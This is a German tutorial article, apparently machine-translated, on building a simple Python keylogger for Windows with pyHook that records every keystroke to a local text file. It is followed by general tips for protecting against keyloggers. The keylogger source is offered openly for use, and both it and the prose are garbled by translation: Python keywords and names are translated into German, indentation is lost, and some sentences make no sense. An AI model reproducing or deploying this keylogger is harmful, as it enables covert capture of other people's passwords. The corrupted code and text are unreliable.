So erstellen Sie einen Keylogger und zeichnen Passwörter in Windows auf

So funktioniert ein Keylogger

Die Mission dieser Art von Malware ist es, registriere alle Schlüssel die wir auf der Tastatur drücken. Auf diese Weise wird jedes Mal, wenn wir uns in die Mail einloggen, Facebook oder einen anderen Dienst, das Programm zeichnet auf, was wir einstellen und stiehlt so den Zugangscode und den Benutzernamen.

Wir können sagen, dass ein Keylogger eines der ältesten Malware-Tools ist. Obwohl Antivirenprogramme heutzutage in der Lage sind, die meisten von ihnen zu erkennen, ist es so, dass Hacker ihre Techniken immer weiter perfektionieren und es schaffen, mehr Opfer sowohl auf Computern als auch auf mobilen Geräten zu erreichen.

Das ist normal in einer Datei versteckt die wir über das Internet herunterladen, eine von uns installierte Anwendung und dergleichen. Es läuft im Hintergrund auf unserem System, ohne dass wir wirklich wissen, dass es funktioniert, und während es alle Tastenanschläge aufzeichnet. Diese kann später an einen von den Angreifern kontrollierten Server gesendet werden.

Dieser Keylogger kann sogar ausschließlich für Passwörter aufzeichnen auf Systemebene und werden auf dem Computer selbst gespeichert. Wenn es sich um ein gemeinsames Team handelt, kann jemand anderes sehen, was die Schlüssel sind.

Schritte, um einen zu erstellen

Wir werden erklären, wie wir das können einen Keylogger lokal erstellen , um unsere Passwörter zu testen. Eine Remote-Erstellung ist vollständiger. Was wir tun werden, ist die Tastenanschläge unseres Computers aufzuzeichnen. Denken Sie daran, dass wir dies nur für den persönlichen Gebrauch tun dürfen, um unsere eigenen Passwörter zu testen und Dritte, die diese Geräte möglicherweise verwenden, nicht zu beeinträchtigen.

Öffnen Sie den Editor

Das erste, was wir tun müssen, ist die Windows Notizblock oder jede andere Anwendung, bei der wir im Klartext schreiben können. Sogar der Python-Editor selbst würde es tun. In dieses von uns erstellte Dokument müssen wir den folgenden Code schreiben:

</pre>
import pyHook, pythoncom, sys, logging
# feel free to set the file_log to a different file name/location

file_log = 'keyloggeroutput.txt'

def OnKeyboardEvent (Ereignis):
Logging.basicConfig (Dateiname = file_log, level = Logging.DEBUG, Format = '% (Nachricht) s')
chr (event. ASCII)
Logging.log (10, chr (event.Ascii))
true zurückgeben
Hooks_manager = pyHook.HookManager ()
Hooks_manager.KeyDown = OnKeyboardEvent
Hooks_manager.HookKeyboard ()
pythoncom.PumpMessages ()

Sobald dies erledigt ist, speichern Sie die Datei als Nächstes in pyw-Format . Wir können es beispielsweise Keylogger.pyw nennen. Einfach mit diesen Schritten haben wir unseren in Python geschriebenen Keylogger bereit. Von diesem Moment an können wir alle Tastenanschläge auf der Tastatur unserer Geräte aufzeichnen. All dies, was Sie aufzeichnen werden, wird in einem separaten Dokument gespeichert.

Python herunterladen und installieren

Python muss installiert sein, damit es funktioniert. Wenn Sie es nicht unter Windows installiert haben, können Sie die offizielle Website besuchen und die neueste Version herunterladen. Es ist derzeit 3.10.1. Außerdem müssen PyHook und Pywin32 installiert sein, damit es reibungslos funktioniert.

Wenn wir es installiert und einsatzbereit haben, müssen wir nur die zuvor erstellte Datei ausführen. Wir müssen auf den Weg gehen, auf dem wir sparen Keylogger.pyw (oder wie auch immer wir es nennen möchten) und doppelklicken. Von diesem Moment an beginnt es, jeden Tastenanschlag aufzuzeichnen, den wir machen.

Prozess im Task-Manager

Wenn Sie überprüfen möchten, ob es richtig funktioniert oder nicht, müssen Sie nur zum Windows Task-Manager . Dazu müssen Sie die Tastenkombination Strg + Alt + Entf drücken und dort öffnen. Alle laufenden Prozesse werden angezeigt und der, der uns in diesem Fall interessiert, ist pythow.exe.

Wenn Sie es beenden möchten, müssen Sie nur zum Task-Manager gehen, auf den Prozess klicken und auf Fertig stellen klicken. Die Registrierung der auf der Tastatur gedrückten Tasten wird automatisch beendet und ein Textdokument im .txt-Format erstellt. Hier wird alles angezeigt, was gedrückt wurde.

Sehen Sie sich die Datei mit den Passwörtern an

Zu sehen Textdatei Mit allen Tasten, die es registriert hat (sowie jedem Tastendruck), müssen wir in das Verzeichnis gehen, in dem die Datei im .pyw-Format war, entweder Keylogger.pyw oder wie auch immer wir es nennen, und eine Textdatei namens keyloggeroutput. txt wird dort angezeigt.

Nach dem Öffnen sehen wir etwas Ähnliches wie im obigen Bild. Wir können die Schlüssel sehen, die es registriert hat. Es ist einfach und ideal, um die Passwörter, die wir in Windows eingeben, zu testen und zu sehen, inwieweit unsere Schlüssel gestohlen werden könnten, wenn sie einen raffinierteren Angriff erleiden, den sie aus der Ferne kontrollieren können.

Tipps zum Schutz

Nachdem wir gesehen haben, wie wir einen einfachen Keylogger für den persönlichen Gebrauch auf unserem Computer erstellen können, werden wir einige Tipps geben, um zu vermeiden, Opfer dieser Art von Angriff zu werden. Es ist wichtig, geschützt zu werden, damit unsere Zugangscodes kann nicht gestohlen werden.

Sicherheitsprogramme

Das erste ist, Sicherheitsprogramme zu haben. EIN gutes Antivirusprogramm ist unerlässlich, um das Eindringen von Viren zu verhindern. Wir können zum Beispiel Windows Defender selbst, Avast, Bitdefender oder einen anderen nennen. Es gibt viele Möglichkeiten, aber wir müssen immer eine der Garantien wählen.

Neben einem Antivirus können wir auch andere Anwendungen haben, wie z Firewall oder sogar Add-ons für den Browser. In allen Fällen tragen sie dazu bei, die Sicherheit zu erhöhen und gefährliche Verbindungen zu vermeiden, die verwendet werden können, um Keylogger und andere Bedrohungen zu schleichen.

Habe alles aktualisiert

Manchmal Schwachstellen treten in Systemen auf . Es gibt Sicherheitslücken, die bestimmte Anwendungen betreffen, beispielsweise den Browser. Dies könnte zum Eindringen von Malware führen und unsere Privatsphäre gefährden. Um dies zu vermeiden, ist es unbedingt erforderlich, die neuesten Versionen zu haben.

Sicherheit Patches werden verwendet, um diese Probleme zu beheben. Wir müssen Windows, den Browser und alle von uns verwendeten Programme aktualisiert haben. Auch die Treiber für die Netzwerkkarte sollten aktuell sein, um das Risiko von Problemen zu verringern.

Verwenden Sie offizielle Apps

Natürlich müssen wir jederzeit nutzen offizielle Programme . Es stimmt, dass wir manchmal die Möglichkeit haben, einige Anwendungen mit zusätzlichen Funktionen zu haben, aber da sie nicht offiziell sind, wissen wir nicht, ob es sich um Garantien handelt und in welcher Weise sie uns beeinträchtigen könnten.

Ein Hacker hat möglicherweise ein Programm erstellt, das vorgibt, legitim zu sein, aber tatsächlich verwendet wird, um Informationen zu stehlen oder einen Keylogger zu schmuggeln. Um dies zu vermeiden, müssen wir jederzeit Software von offiziellen Stores und sicheren Seiten herunterladen.

Gesunder Menschenverstand

Ein weiterer Tipp ist, den gesunden Menschenverstand zu bewahren. Es ist wichtig, Vermeiden Sie Fehler , wie zum Beispiel das Herunterladen von Dateien, die uns erreichen über E-Mail ohne die Identität zu überprüfen oder Links über Websites von Drittanbietern zu öffnen, die möglicherweise nur zum Stehlen von Daten erstellt wurden.

Die meisten Angriffe erfolgen durch Benutzerinteraktion. Sogar Keylogger, die in vielen Fällen eine Datei herunterladen oder ein Programm installieren müssen, das wir zuvor von einer unsicheren Seite heruntergeladen haben.

Kurz gesagt, das Erstellen eines Keyloggers für den persönlichen Gebrauch ist, wie wir gesehen haben, sehr einfach. Ein Angreifer kann jedoch ein ausgeklügelteres Passwort erstellen und in der Lage sein, Passwörter aus der Ferne zu stehlen. Es ist wichtig, geschützt zu sein und keine Fehler zu machen, die uns in unserem Alltag beeinträchtigen können.